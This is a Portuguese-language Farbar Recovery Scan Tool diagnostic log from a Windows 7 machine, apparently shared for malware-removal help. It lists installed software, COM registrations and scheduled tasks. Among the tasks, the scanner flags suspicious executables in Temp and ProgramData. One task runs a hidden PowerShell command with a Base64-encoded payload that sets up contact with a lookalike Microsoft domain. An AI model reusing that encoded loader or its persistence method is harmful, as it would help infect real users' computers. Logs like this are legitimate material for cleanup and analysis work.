cjoint

Publicité


Publicité

Format du document : text/plain

Prévisualisation

Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão:27-01-2016
Executado por Volkhadan (2016-02-06 12:04:40)
Executando a partir de C:\Users\Volkhadan\Desktop
Windows 7 Professional Service Pack 1 (X64) (2014-06-14 19:11:32)
Modo da Inicialização: Normal
==========================================================


==================== Contas: =============================

Administrador (S-1-5-21-1084134890-3557609745-897204792-500 - Administrator - Disabled)
Convidado (S-1-5-21-1084134890-3557609745-897204792-501 - Limited - Disabled)
Volkhadan (S-1-5-21-1084134890-3557609745-897204792-1001 - Administrator - Enabled) => C:\Users\Volkhadan

==================== Central de Segurança ========================

(Se uma entrada for incluída na fixlist, será removida.)

AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programas Instalados ======================

(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)

µTorrent (HKU\S-1-5-21-1084134890-3557609745-897204792-1001\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)
AC-3 ACM Codec x64 2.2 (HKLM\...\AC3ACM) (Version: 2.2 - fccHandler)
Adobe Acrobat Reader DC - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AC0F074E4100}) (Version: 15.010.20056 - Adobe Systems Incorporated)
Adobe After Effects CC 2014 (HKLM-x32\...\{2B22C750-5C3B-4738-B621-BA786AC7A494}) (Version: 13.0.0 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.7.0.413 - Adobe Systems Incorporated)
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2014 (HKLM-x32\...\{663DEEEF-EF34-4DCB-8687-73A7AA146E02}) (Version: 8.0.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.9.160 - Adobe Systems, Inc.)
AIDA64 Extreme Edition v2.85 (HKLM-x32\...\AIDA64 Extreme Edition_is1) (Version: 2.85 - FinalWire Ltd.)
Apple Mobile Device Support (HKLM\...\{B678797F-DF38-4556-8A31-8B818E261868}) (Version: 8.0.0.23 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Ashampoo Burning Studio 15 v.15.0.2 (HKLM-x32\...\{91B33C97-5B38-0A92-D04A-A0F26F3F87D4}_is1) (Version: 15.0.2 - Ashampoo GmbH & Co. KG)
aTube Catcher (HKLM-x32\...\aTube Catcher) (Version: 3.8.7971 - DsNET Corp)
aTube Catcher versão 3.8 (HKLM-x32\...\{D43B360E-722D-421B-BC77-20B9E0F8B6CD}_is1) (Version: 3.8 - DsNET Corp)
Audacity 2.0.5 (HKLM-x32\...\Audacity_is1) (Version: 2.0.5 - Audacity Team)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.7.1 - EA Digital Illusions CE AB)
CCleaner (HKLM\...\CCleaner) (Version: 4.15 - Piriform)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
CPUID HWMonitor 1.26 (HKLM\...\CPUID HWMonitor_is1) (Version: - )
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.49.1.0356 - Disc Soft Ltd)
Disk Space Finder (HKU\S-1-5-21-1084134890-3557609745-897204792-1001\...\c6ddfe369f967ae4) (Version: 1.1.0.4 - IntelliConcepts)
DriverEasy 4.7.1 (HKLM\...\DriverEasy_is1) (Version: 4.7.1.0 - Easeware)
DriverToolkit version 8.3.0.0 (HKLM-x32\...\{D66BF89F-B0A2-48F5-A2E4-242EB645AB76}_is1) (Version: 8.3.0.0 - Megaify Software)
DriveSpacio 0.2.2 Build 1 (Beta) (HKLM-x32\...\DriveSpacio_is1) (Version: - Agitaf)
Dropbox (HKU\S-1-5-21-1084134890-3557609745-897204792-1001\...\Dropbox) (Version: 3.12.5 - Dropbox, Inc.)
Duplicate Cleaner Free 3.2.6 (HKLM-x32\...\Duplicate Cleaner Free) (Version: 3.2.6 - DigitalVolcano Software Ltd) <==== ATENÇÃO
Facebook Video Calling 3.1.0.521 (HKLM-x32\...\{2091F234-EB58-4B80-8C96-8EB78C808CF7}) (Version: 3.1.521 - Skype Limited)
ffdshow x64 v1.3.4500 [2013-01-06] (HKLM\...\ffdshow64_is1) (Version: 1.3.4500.0 - )
Foxit PDF Editor (HKLM-x32\...\Foxit PDF Editor) (Version: 2.2.1.1119 - Foxit Corporation)
Foxit Reader 5.1 (HKLM-x32\...\Foxit Reader_is1) (Version: 5.1.4.104 - Foxit Corporation)
GIMP 2.8.10 (HKLM\...\GIMP-2_is1) (Version: 2.8.10 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.103 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HandBrake 0.10.3 (HKLM-x32\...\HandBrake) (Version: 0.10.3 - )
Intel(R) Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2555 - Intel Corporation)
Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - )
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (Português do Brasil) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1046) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
MiniTool Partition Wizard Free 9.1 (HKLM\...\{05D996FA-ADCB-4D23-BA3C-A7C184A8FAC6}_is1) (Version: - MiniTool Solution Ltd.)
Mozilla Firefox 43.0.1 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 43.0.1 (x86 pt-BR)) (Version: 43.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.1.5828 - Mozilla)
MPC-HC 1.6.8 (64-bit) (HKLM\...\{2ACBF1FA-F5C3-4B19-A774-B22A31F231B9}_is1) (Version: 1.6.8.7417 - MPC-HC Team)
Native Instruments Controller Editor (HKLM-x32\...\Native Instruments Controller Editor) (Version: 1.6.2.1863 - Native Instruments)
Native Instruments Guitar Rig 3 (HKLM-x32\...\Native Instruments Guitar Rig 3) (Version: - )
Native Instruments Service Center (HKLM-x32\...\Native Instruments Service Center) (Version: 2.5.2.1549 - Native Instruments)
Native Instruments Traktor 2 (HKLM-x32\...\Native Instruments Traktor 2) (Version: 2.6.8.382 - Native Instruments)
Need for Speed Underground 2 (HKLM-x32\...\Need for Speed Underground 2) (Version: - )
Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation)
Preset Manager 2.0 (HKLM-x32\...\{FCFE3F81-C977-4D31-877B-2778BB2A02DE}) (Version: 2.0.114 - Sony)
PreSonus Studio One 2 x64 (HKLM\...\PreSonus Studio One 2) (Version: 2.5.0.20189 - PreSonus Audio Electronics)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
RealDownloader (x32 Version: 17.0.15.4 - RealNetworks, Inc.) Hidden
RealDownloader (x32 Version: 17.0.15.7 - RealNetworks) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer Cloud (HKLM-x32\...\RealPlayer 17.0) (Version: 17.0.15 - RealNetworks)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5964 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{9D3D8C60-A55F-4fed-B2B9-173F09590E16}) (Version: 1.00.0180 - REALTEK Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Recuva (HKLM\...\Recuva) (Version: 1.42 - Piriform)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version: - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version: - Microsoft) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Sony Sound Forge 7.0 (HKLM-x32\...\{0712667C-A171-49AE-A098-4ACDA28625F8}) (Version: 7.0.214 - Sony)
SoundTap Streaming Audio Recorder (HKLM-x32\...\SoundTap) (Version: - NCH Software)
Spotify (HKU\S-1-5-21-1084134890-3557609745-897204792-1001\...\Spotify) (Version: 1.0.21.143.g76c19bcd - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: - Valve Corporation)
StrongRecovery (HKLM-x32\...\StrongRecovery) (Version: - )
Subtitle Workshop 2.51 (HKLM-x32\...\SubtitleWorkshop) (Version: - )
Suporte para Aplicativos Apple (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
SurCode for Dolby Pro Logic II (HKLM-x32\...\SurCode for Dolby Pro Logic II) (Version: - )
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 16.6.2.13 - Synaptics Incorporated)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.36244 - TeamViewer)
The Expendabros (HKLM-x32\...\Steam App 312990) (Version: - Free Lives)
TOSHIBA Web Camera Application (HKLM-x32\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.1.1.9 - TOSHIBA Corporation)
Unity Web Player (HKU\S-1-5-21-1084134890-3557609745-897204792-1001\...\UnityWebPlayer) (Version: 5.2.0f3 - Unity Technologies ApS)
UpdateService (x32 Version: 1.0.0 - RealNetworks, Inc.) Hidden
US-122 MKII / US-144 MKII (HKLM\...\USB_AUDIO_DEusb-audio.deTascam) (Version: - )
Vegas Pro 12.0 (64-bit) (HKLM\...\{A7500970-FE98-11E1-B560-F04DA23A5C58}) (Version: 12.0.367 - Sony)
Video Downloader (x32 Version: 1.0.0 - RealNetworks) Hidden
VideoPad Video Editor (HKLM-x32\...\VideoPad) (Version: 4.05 - NCH Software)
VirtualDJ PRO Full (HKLM-x32\...\{74F28F11-404B-4CEA-92FF-37BF476F239E}) (Version: 7.0.3 - Atomix Productions)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Warsaw 1.11.0.42826 64 bits (HKLM\...\{20E60725-16C8-4FB9-8BC2-AF92C5F8D06D}_is1) (Version: 1.11.0.42826 - GAS Tecnologia)
WinRAR 4.20 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)

==================== Exame Personalizado CLSID (Whitelisted): ==========================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B0-F1D4349F0000}\InprocServer32 -> C:\Users\Volkhadan\AppData\Local\GAS Tecnologia\GBBD\npsf_bb_64.dll (GAS Tecnologia)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B1-F1D4349F0000}\InprocServer32 -> C:\Users\Volkhadan\AppData\Local\GAS Tecnologia\GBBD\npsf_bb_64.dll (GAS Tecnologia)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1084134890-3557609745-897204792-1001_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)

==================== Tarefas Agendadas (Whitelisted) =============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

Task: {0D8516BD-208D-40C6-9F6B-4DB9982409B2} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1084134890-3557609745-897204792-1001Core => C:\Users\Volkhadan\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-21] (Dropbox, Inc.)
Task: {1CCD6D15-2D2D-4ACF-AD84-49E8CBD5E45E} - System32\Tasks\DriverEasy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe [2014-05-29] (Easeware)
Task: {3868E696-F8C1-47A1-B73E-1799B3AD82EC} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-1084134890-3557609745-897204792-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2014-10-30] (RealNetworks, Inc.)
Task: {4015C241-A16A-4E55-B79D-27CBFD44D521} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1084134890-3557609745-897204792-1001 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2014-10-26] (RealNetworks, Inc.)
Task: {40275530-E2C3-4AFE-93D4-7DC1B4817945} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-27] (Adobe Systems Incorporated)
Task: {53D0D045-0E21-4607-9ED2-20EB9A1994A5} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {5A40E926-9E86-4B89-9CFD-B12311724371} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {5B45DDE0-72ED-4C7D-A0FE-FEC0730A5795} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1084134890-3557609745-897204792-1001Core => C:\Users\Volkhadan\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-07-17] (Facebook Inc.)
Task: {679FA0DC-92A3-4116-8F96-19899B05C9F7} - System32\Tasks\ttwifi => C:\Program Files (x86)\ttwifi\tiantianwifi.exe
Task: {6B4B1564-4CC4-425B-A9F6-54276DA17278} - System32\Tasks\Pritc => C:\Users\Volkhadan\AppData\Local\Temp\00017564\casrss.exe <==== ATENÇÃO
Task: {793D7F47-A5F2-4E73-B90B-45FAD747DA6D} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1084134890-3557609745-897204792-1001UA => C:\Users\Volkhadan\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-21] (Dropbox, Inc.)
Task: {97C3DA4E-F1CA-4E63-8DD9-4AAA5AEF67C1} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1084134890-3557609745-897204792-1001UA => C:\Users\Volkhadan\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-07-17] (Facebook Inc.)
Task: {9DF8DDBA-4892-4BCF-B1F8-7464EF40BD67} - System32\Tasks\osTip => C:\ProgramData\WindowsMsg\osmsg.exe [2016-02-04] ()
Task: {AE17415E-6BF0-415E-811D-E47B98EC3953} - System32\Tasks\RealDownloader Update Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [2014-10-29] ()
Task: {B2C906D9-7B74-4043-9721-0EC9EF274623} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-1084134890-3557609745-897204792-1001 => C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe [2014-10-26] (RealNetworks, Inc.)
Task: {C30D3198-C932-45F3-80CB-7BF2A803D680} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-08] (Google Inc.)
Task: {C4661D71-90CC-4B6F-B82D-7F62B2EA02D7} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-08] (Google Inc.)
Task: {CBDA2C9E-7220-4415-B5D9-0EEA543B7CE3} - System32\Tasks\Games\UpdateCheck_S-1-5-21-1084134890-3557609745-897204792-1001
Task: {DC9D56D9-845C-402C-B9EC-EB76B805DAE8} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-1084134890-3557609745-897204792-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2014-10-30] (RealNetworks, Inc.)
Task: {DD9F510C-95F4-499A-90C8-BAC5BC372FF4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => start sppsvc
Task: {DE874BA5-B11A-44B6-A9E6-9132C9CE9A3F} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated)
Task: {E38160DE-653B-4DA0-ABC6-A039E04FBB63} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {EAECD6FC-6EBF-4C04-8FCC-63BD5BFADECC} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1084134890-3557609745-897204792-1001 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2014-10-26] (RealNetworks, Inc.)
Task: {F964D381-6F24-401F-96A9-96A9F753D93D} - System32\Tasks\{0C0A0D47-0F7D-0F09-0811-0B7A080C110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAG0AeQBjAHIAbwBzAG8AZgB0AHMALgBjAG8AbQAvAHUALwA/AGEAPQBMADcAawA0AGUAbgBuAFAALQBqAGoAdgB1AFYAQwB1ADUAcAA1AHgAUwBnAFAASABSAGQAbQBBADgAYwBVAE4AZABfADEASQBEADIASQA0ADEAVABBADAAOQBlADAASQA0AFQATABUAGEAagBEAEsAeQA0AHYAbgBrAGQAYwAyAGsAcwBPAHEAdgAyAHoASABKAFEAegBaAG0ATQA5AFEAVQBPAFoALQAwAFUANgA1AG4AaAB4AFQANwBsAFUARwBtAFQAUABRAHQAUwBJAFoAcgBIAGoAWABvADgAcABCAFkAcwBJADQAaQA2AEkATgB4AFIAagBmAHYAagBnAHgAcQBuAHYAQQB2AHYAZwBmAFcAUAB2AHYASgBZAEwAMgBzAHEAMwBLAFIARwA5AGEALQBxAHAATwBtAGgAMgB2AHEAVABwAFcASgAyAGMAdABJAHAAZABNAFYARAB4ADAARAB1AFIAbwAwADEAeAB1AHcAawBZADEAVQBuAGcANwByAEsARQBmAFMAaQBIAG8AVwBFAHgAcwBxAGUATQBQAHUAagAzAF8AQgA2AGsAQQBGADAAcAB0AGMAbwBuAEUAcAB3AGcASABMAHUAeQBQAC0AaQBpAEQAdAA3AEwAaABzADIAXwA4AFMATwBMAGMATQBLAHYANQAxAHgATABvADIAbQBfAG0AWQAzADUASQBVAFIAMQA0AFkATgBaADYAOABzAGsAeABEADgAaQBPADcAaABFAFUASABGAFcAcQBuADMAUQB1AHAARQBkAE0AMwA5AEIAQwAtAG0AeABQADUAQwBuAFEAWQBFADQAQQBTAGgAUAA2ADAAeQBGAFAAaABvAHEAbQBOADMAbwBRAFEAVABqAEgASgBsAFUAeQBtAFoAOAA4AHgAWgAyADUAbwBmAFQASwBDAEgAdwBuAGwARgBvAGYAdABoAHQASwBGADcAUgBrAG4AbwAyAFEAcQBvAGYAYQBoADkAVQA4AEQAZQAxAHQAZwB5AGgARQBlAGMAaABVAGwALQB2AHcAbwBDADUARABCAHAARgA0AFcAUwBuAEoAZABaAFUAagBCAEwANgBmAEkAbwBWAG0AaQA5ADAANQA3AFMAcABHADUAeABGAF8AMAAtAGMARgB1ADEATQB2AHEAOQBEADUAcQBQAEEAdwBiAEgAMAAxADIAZgBLAGgAYgBwAHoAVQBZAGwAMgBxAEcAUwBIAEgAWQ